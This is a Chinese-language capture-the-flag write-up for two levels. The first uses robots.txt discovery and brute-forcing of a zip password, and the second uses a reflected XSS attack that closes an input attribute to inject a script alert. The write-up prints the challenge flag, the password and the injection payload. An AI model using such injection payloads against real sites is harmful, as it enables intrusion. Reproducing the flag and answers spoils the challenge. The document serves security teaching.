level 1#
./robot/index.html
打開網址顯示
我最討厭 spider!!!
spider 爬蟲
很多網站中都會設置 robots.txt 文件,用來規範、約束或者是禁止爬蟲對於網站中數據的採集等操作。robots.txt 文件用於禁止網絡爬蟲訪問網站指定目錄
./robot/robots.txt打開顯示
sir,this way!!!
f1a9.zip
tip: winrar Yes!!!
訪問./robot/f1a9.zip下載 zip 文件
zip 文件加密了,tip:winrar Yes!!!提示用 WinRAR 打開
打開後看到註釋顯示密碼:??????338
一個 6 位數加上 338 共九位
暴力破解
flag{th1s_1s_crc_crack}
密碼:860834338
解壓後是一張圖片,左上角有網易雲 logo,長和寬是:798px X 733px
聯想到音樂封面圖應該是正方形,用 010 修改為 798x798
level 2#
./xss/index.php打開是關於 xss 的,
相關 ->標籤閉合繞過
搜索框輸入 aaaaa,Dom 結構如下
<form action="index.php" method="GET">
<input name="keyword" value="aaaaaa">
<input type="submit" name="submit" value="搜索">
</form>
前面是 value="後面是">
輸入"><p>test</p>閉合 input 標籤插入段落,顯示如下
<form action="index.php" method="GET">
<input name="keyword" value="">
<p>test</p>
">
<input type="submit" name="submit" value="搜索">
</form>
p 標籤被解析
提示要彈框算成功,輸入"><script>alert("q")</script>